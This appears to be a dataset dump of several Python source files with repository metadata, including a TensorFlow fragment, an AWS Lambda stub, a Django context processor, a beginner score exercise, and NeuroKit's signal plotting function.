with tf.device(tfdevices.getDeviceSpec(0)):
matrix0 = tf.constant([[3.,3.]])
product1 = tf.matmul(matrix0, matrix1)
product2 = tf.matmul(matrix2, matrix1)
with tf.Session(tfdevices.localGRPC()) as sess:
res = sess.run(product1)
print res
res = sess.run(product2)
print res
| 34.638298 | 116 | 0.673219 |
fe97b6953c22bb335b56638721adf4a720e34f5f | 2,922 | py | Python | FAUCovidCrawler/AWSLambda/lambda_function.py | Awannaphasch2016/CDKFAUCovid19Cralwer | a84d90612314cb4d4618da95238617a524b1b280 | [
"MIT"
] | null | null | null | FAUCovidCrawler/AWSLambda/lambda_function.py | Awannaphasch2016/CDKFAUCovid19Cralwer | a84d90612314cb4d4618da95238617a524b1b280 | [
"MIT"
] | null | null | null | FAUCovidCrawler/AWSLambda/lambda_function.py | Awannaphasch2016/CDKFAUCovid19Cralwer | a84d90612314cb4d4618da95238617a524b1b280 | [
"MIT"
] | null | null | null | '''
Original code contributor: mentzera
Article link: https://aws.amazon.com/blogs/big-data/building-a-near-real-time-discovery-platform-with-aws/
'''
import boto3
import json
import twitter_to_es
# from Examples.Demo.AWS_Related.TwitterStreamWithAWS.LambdaWithS3Trigger import \
# twitter_to_es
from tweet_utils import \
get_tweet, id_field, get_tweet_mapping
headers = {"Content-Type": "application/json"}
s3 = boto3.client('s3')
kinesis_client = boto3.client('kinesis')
# dynamoDb_client = boto3.client('dynamodb')
# Lambda execution starts here
| 33.204545 | 142 | 0.589322 |
fe97e4775b3fbd1abdf826717d17fd4e96f2144c | 353 | py | Python | user_messages/context_processors.py | everaccountable/django-user-messages | 101d539b785bdb440bf166fb16ad25eb66e4174a | [
"MIT"
] | 21 | 2018-04-18T17:58:12.000Z | 2022-01-19T12:41:01.000Z | user_messages/context_processors.py | everaccountable/django-user-messages | 101d539b785bdb440bf166fb16ad25eb66e4174a | [
"MIT"
] | 4 | 2018-04-24T11:04:15.000Z | 2022-02-03T18:35:21.000Z | user_messages/context_processors.py | everaccountable/django-user-messages | 101d539b785bdb440bf166fb16ad25eb66e4174a | [
"MIT"
] | 7 | 2018-03-04T16:03:44.000Z | 2022-02-03T15:50:39.000Z | from django.contrib.messages.constants import DEFAULT_LEVELS
from user_messages.api import get_messages
def messages(request):
"""
Return a lazy 'messages' context variable as well as
'DEFAULT_MESSAGE_LEVELS'.
"""
return {
"messages": get_messages(request=request),
"DEFAULT_MESSAGE_LEVELS": DEFAULT_LEVELS,
}
| 23.533333 | 60 | 0.708215 |
fe98a505a6e3e05977900098d14a4c4efb60654a | 502 | py | Python | Day_5/highest_score.py | ecanro/100DaysOfCode_Python | a86ebe5a793fd4743e0de87454ba76925efdd23d | [
"MIT"
] | null | null | null | Day_5/highest_score.py | ecanro/100DaysOfCode_Python | a86ebe5a793fd4743e0de87454ba76925efdd23d | [
"MIT"
] | null | null | null | Day_5/highest_score.py | ecanro/100DaysOfCode_Python | a86ebe5a793fd4743e0de87454ba76925efdd23d | [
"MIT"
] | null | null | null | ## Highest Score
# Don't change the code below
student_scores = input("Input a list of student scores: ").split()
for n in range(0, len(student_scores)):
student_scores[n] = int(student_scores[n])
print(student_scores)
# Don't change the code above
# Write your code below this row
highest_score = 0
for scores in student_scores:
if scores > highest_score:
highest_score = scores
print(f'The highest score is: {highest_score}')
# functional code
print(max(student_scores)) | 26.421053 | 66 | 0.721116 |
fe9913a9a0d00104117bbc4e7f42cf9196b11854 | 8,791 | py | Python | finetune/finetune.py | zaixizhang/MGSSL | fdb7e78bb927d735ed64dc78fb792adb13352e1c | [
"Apache-2.0"
] | 43 | 2021-10-15T01:11:36.000Z | 2022-03-31T02:05:41.000Z | finetune/finetune.py | zaixizhang/MGSSL | fdb7e78bb927d735ed64dc78fb792adb13352e1c | [
"Apache-2.0"
] | 5 | 2021-12-09T08:07:22.000Z | 2022-03-02T07:34:34.000Z | finetune/finetune.py | zaixizhang/MGSSL | fdb7e78bb927d735ed64dc78fb792adb13352e1c | [
"Apache-2.0"
] | 7 | 2021-11-23T01:15:36.000Z | 2022-03-07T16:30:30.000Z | import argparse
from loader import MoleculeDataset
from torch_geometric.data import DataLoader
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from tqdm import tqdm
import numpy as np
from model import GNN, GNN_graphpred
from sklearn.metrics import roc_auc_score
from splitters import scaffold_split, random_split
import pandas as pd
import os
import shutil
from tensorboardX import SummaryWriter
criterion = nn.BCEWithLogitsLoss(reduction = "none")
if __name__ == "__main__":
main()
| 42.674757 | 176 | 0.657604 |
fe995885e2a5bd2844820d9d11a66c6433d1051b | 1,166 | py | Python | jumpscale/packages/vdc_dashboard/bottle/api/exceptions.py | threefoldtech/js-sdk | 811f783ac34a60225175bab2d806802a87b9d5c7 | [
"Apache-2.0"
] | 13 | 2020-09-02T09:05:08.000Z | 2022-03-12T02:43:24.000Z | jumpscale/packages/vdc_dashboard/bottle/api/exceptions.py | threefoldtech/js-sdk | 811f783ac34a60225175bab2d806802a87b9d5c7 | [
"Apache-2.0"
] | 1,998 | 2020-06-15T11:46:10.000Z | 2022-03-24T22:12:41.000Z | jumpscale/packages/vdc_dashboard/bottle/api/exceptions.py | threefoldtech/js-sdk | 811f783ac34a60225175bab2d806802a87b9d5c7 | [
"Apache-2.0"
] | 8 | 2020-09-29T06:50:35.000Z | 2021-06-14T03:30:52.000Z | from jumpscale.core import exceptions
| 13.55814 | 62 | 0.732419 |
fe99a748e2fcbf259f6611afd0ca5930032c99b6 | 5,703 | py | Python | neurokit2/signal/signal_plot.py | gutierrezps/NeuroKit | a30f76e64b4108abdc652a20391dc0288c62501d | [
"MIT"
] | 1 | 2022-03-20T21:09:34.000Z | 2022-03-20T21:09:34.000Z | neurokit2/signal/signal_plot.py | Lei-I-Zhang/NeuroKit | a30f76e64b4108abdc652a20391dc0288c62501d | [
"MIT"
] | null | null | null | neurokit2/signal/signal_plot.py | Lei-I-Zhang/NeuroKit | a30f76e64b4108abdc652a20391dc0288c62501d | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from ..events import events_plot
from ..stats import standardize as nk_standardize
def signal_plot(
signal, sampling_rate=None, subplots=False, standardize=False, labels=None, **kwargs
):
"""Plot signal with events as vertical lines.
Parameters
----------
signal : array or DataFrame
Signal array (can be a dataframe with many signals).
sampling_rate : int
The sampling frequency of the signal (in Hz, i.e., samples/second). Needs to be supplied if
the data should be plotted over time in seconds. Otherwise the data is plotted over samples.
Defaults to None.
subplots : bool
If True, each signal is plotted in a subplot.
standardize : bool
If True, all signals will have the same scale (useful for visualisation).
labels : str or list
Defaults to None.
**kwargs : optional
Arguments passed to matplotlib plotting.
Examples
----------
>>> import numpy as np
>>> import pandas as pd
>>> import neurokit2 as nk
>>>
>>> signal = nk.signal_simulate(duration=10, sampling_rate=1000)
>>> nk.signal_plot(signal, sampling_rate=1000, color="red")
>>>
>>> data = pd.DataFrame({"Signal2": np.cos(np.linspace(start=0, stop=20, num=1000)),
... "Signal3": np.sin(np.linspace(start=0, stop=20, num=1000)),
... "Signal4": nk.signal_binarize(np.cos(np.linspace(start=0, stop=40, num=1000)))})
>>> nk.signal_plot(data, labels=['signal_1', 'signal_2', 'signal_3'], subplots=True)
>>> nk.signal_plot([signal, data], standardize=True)
"""
# Sanitize format
if isinstance(signal, list):
try:
for i in signal:
len(i)
except TypeError:
signal = np.array(signal)
if isinstance(signal, pd.DataFrame) is False:
# If list is passed
if isinstance(signal, list) or len(np.array(signal).shape) > 1:
out = pd.DataFrame()
for i, content in enumerate(signal):
if isinstance(content, (pd.DataFrame, pd.Series)):
out = pd.concat([out, content], axis=1, sort=True)
else:
out = pd.concat(
[out, pd.DataFrame({"Signal" + str(i + 1): content})],
axis=1,
sort=True,
)
signal = out
# If vector is passed
else:
signal = pd.DataFrame({"Signal": signal})
# Copy signal
signal = signal.copy()
# Guess continuous and events columns
continuous_columns = list(signal.columns.values)
events_columns = []
for col in signal.columns:
vector = signal[col]
if vector.nunique() == 2:
indices = np.where(vector == np.max(vector.unique()))
if bool(np.any(np.diff(indices) == 1)) is False:
events_columns.append(col)
continuous_columns.remove(col)
# Adjust for sampling rate
if sampling_rate is not None:
signal.index = signal.index / sampling_rate
title_x = "Time (seconds)"
else:
title_x = "Time"
# x_axis = np.linspace(0, signal.shape[0] / sampling_rate, signal.shape[0])
# x_axis = pd.DataFrame(x_axis, columns=["Time (s)"])
# signal = pd.concat([signal, x_axis], axis=1)
# signal = signal.set_index("Time (s)")
# Plot accordingly
if len(events_columns) > 0:
events = []
for col in events_columns:
vector = signal[col]
events.append(np.where(vector == np.max(vector.unique()))[0])
plot = events_plot(events, signal=signal[continuous_columns])
if sampling_rate is None and signal.index.is_integer():
plot.gca().set_xlabel("Samples")
else:
plot.gca().set_xlabel(title_x)
else:
# Aesthetics
colors = [
"#1f77b4",
"#ff7f0e",
"#2ca02c",
"#d62728",
"#9467bd",
"#8c564b",
"#e377c2",
"#7f7f7f",
"#bcbd22",
"#17becf",
]
if len(continuous_columns) > len(colors):
colors = plt.cm.viridis(np.linspace(0, 1, len(continuous_columns)))
# Plot
if standardize is True:
signal[continuous_columns] = nk_standardize(signal[continuous_columns])
if subplots is True:
_, axes = plt.subplots(nrows=len(continuous_columns), ncols=1, sharex=True, **kwargs)
for ax, col, color in zip(axes, continuous_columns, colors):
ax.plot(signal[col], c=color, **kwargs)
else:
plot = signal[continuous_columns].plot(subplots=False, sharex=True, **kwargs)
if sampling_rate is None and signal.index.is_integer():
plt.xlabel("Samples")
else:
plt.xlabel(title_x)
# Tidy legend locations and add labels
if labels is None:
labels = continuous_columns.copy()
if isinstance(labels, str):
n_labels = len([labels])
labels = [labels]
elif isinstance(labels, list):
n_labels = len(labels)
if len(signal[continuous_columns].columns) != n_labels:
raise ValueError(
"NeuroKit error: signal_plot(): number of labels does not equal the number of plotted signals."
)
if subplots is False:
plt.legend(labels, loc=1)
else:
for i, label in enumerate(labels):
axes[i].legend([label], loc=1)
| 33.946429 | 109 | 0.57198 |